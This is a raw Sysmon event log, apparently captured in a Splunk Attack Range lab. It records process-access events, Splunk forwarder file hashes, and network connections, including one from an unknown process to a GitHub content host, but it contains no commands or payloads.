21:50:27.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917983Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:27.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917982Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:27.320{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09EF483DC8E6E51F80D09FF1DD9ED532,SHA256=9B3970DB1D443CCE71E090F8288703D852606E2EFA8DD74B58FA29C4D940DC82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917981Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:27.320{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0C7089271288994C26B28A3B9AE74936,SHA256=45875C68E0478621FBCF3EE70E89416D7C22317F0C0A5468D01A35A33EA5D7EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917980Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:27.320{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9E321186E878724C6ECE5B7062D13F2,SHA256=804AD18A195F85571E704216D7A2F4A0FA8F44CA73ACB8877EBACBECE9EA61FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638624Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:22.489{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57261-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638623Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:27.053{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE957D064DC87096951B64FC72DF15C4,SHA256=D3DD8E191B44A0841560C1ADA8524B56A5E0F70C56C960B5DAE074623FFB77AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917991Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.884{00000000-0000-0000-0000-000000000000}7404<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1518-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917990Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:28.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917989Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:28.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917988Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:28.499{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC28A8D81D2514313884EE367B71B3F1,SHA256=F75968FD3E217ECA44889DAAF90C1CFF51DD4CBB081D58813622FD832D703895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638625Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:28.069{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E44D94B56E363F2D9D0733F12A4409,SHA256=5312F8607CCB3FAC2A26FB87F04EC33961FF5EFB71C5B9107C9C6BD1F7AA387A,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000005917987Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.888{00000000-0000-0000-0000-000000000000}7404raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005917986Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:28.194{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C11B89CA5109A7AE2658BAE2405EA272,SHA256=1257028FB890D1433B0B033A816B513E71CE20480758EED59E91D58F12FB1ABD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917985Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:24.932{00000000-0000-0000-0000-000000000000}7404<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1519-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917995Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:29.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917994Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:29.740{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917993Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:29.515{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A13BE6D0C8490881AC5CE63027C37B,SHA256=9B03A65F7C807BBD85EC0C6B7E9B3AB3818B59AEA8454D09BB300B11D05F4932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638626Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:29.085{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF30FE33EA057D7A524EF33810E27828,SHA256=6238A5AF4EA074B78492903B92ADD58E5B78472BC3ADAC5DF9FBB6304E3C463A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917992Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:25.872{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1520-false10.0.1.12-8000- 10341000x80000000000000005917999Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:30.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917998Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:30.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917997Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:30.571{896A638B-FDE4-6058-4A12-00000000AE01}6364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917996Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:30.528{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9E69D7B0B693135F6C464DE602B4E5C,SHA256=2DFAA00D3A9F2D2408AF0C87421EF7375C1733EC82D939817988A212D98B7537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638627Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:30.100{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC1EDC7B8C33E9CF70225CE0012C2BC4,SHA256=4D7703FD6C42C775A003E8AF16310484A6257EDD35C892439C39CED570C7E951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918003Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:31.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918002Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:31.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918001Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:31.593{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CAD2B7941B21A548A1F2CB7EE85A8EC,SHA256=14450B12EBB09AA3216CA4CDC4C5517E7F51AB3291DF9D1B7D2EB94A660E9D9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918000Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:31.557{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=794F597C523FB92747A3F9DF955654CF,SHA256=449B52AEE5FED54AB10DC0D9D525F592554468C6796047A33B3DC4FD31A8CD6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638628Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:31.116{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49191A07481248091637EA287ED2383D,SHA256=9504E5C771B5F08A7257ECC9466903EF96FA974E2256DE8E579DA7A60D633C08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918006Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:32.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918005Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:32.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918004Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:32.562{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A54F6D73F66D90808C90C99AC0E1BE,SHA256=1E2E152593213C0E3BE34AF762F966E526D013EB05313DD53227D70C7E00F510,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638632Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:28.333{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57262-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638631Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:32.132{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=655A00C74D23CBDB4535CB408363FA77,SHA256=D204F1340629E51D14359573B59535E129EAEA02F47109D6F3A68611A97D4E64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638630Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:32.085{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2860D4376F9A071F9B9BCFB322353C19,SHA256=5E24A9597250645313508A9A65F257A648BC12DB97D5F4AFC334E6B1A1235FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638629Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:32.085{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBF1AC33AA479FF2AE5D3A09CEB288E0,SHA256=A6FB5E63F0039E89BE6261E74262C67DBB25B5FE05C15040F7CA891F292FCEB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918010Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:33.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918009Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:33.741{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918008Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:33.567{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCB4402C8D5BD9153FA29C7523FDFD7,SHA256=D4EE9A05EBBB31CC89B10B60F2EE288F45DB07ADC245899A1FA83553CB55A790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638633Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:33.147{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F994719FFF0473D138F5CCAB6C982C5,SHA256=25A5E71A24E981715D388A0E04E2740BF9471DDC4D1949CB86341A2728C25D0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918007Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:29.248{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1521-false10.0.1.12-8089- 23542300x80000000000000005918015Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:34.804{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A2646DFD215D21346B578BAE745B02,SHA256=CEA5355407DF3B9200960958D50242C800D5796D0C25A37E97D095C38AB0E7A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638634Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:34.163{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=956911D20B8B16943130042000B2B57C,SHA256=4889BE0857A3F9823A4AFE42FEE98B3731DADFF0158A5DA01068BDA86F2EF822,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918014Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:34.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918013Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 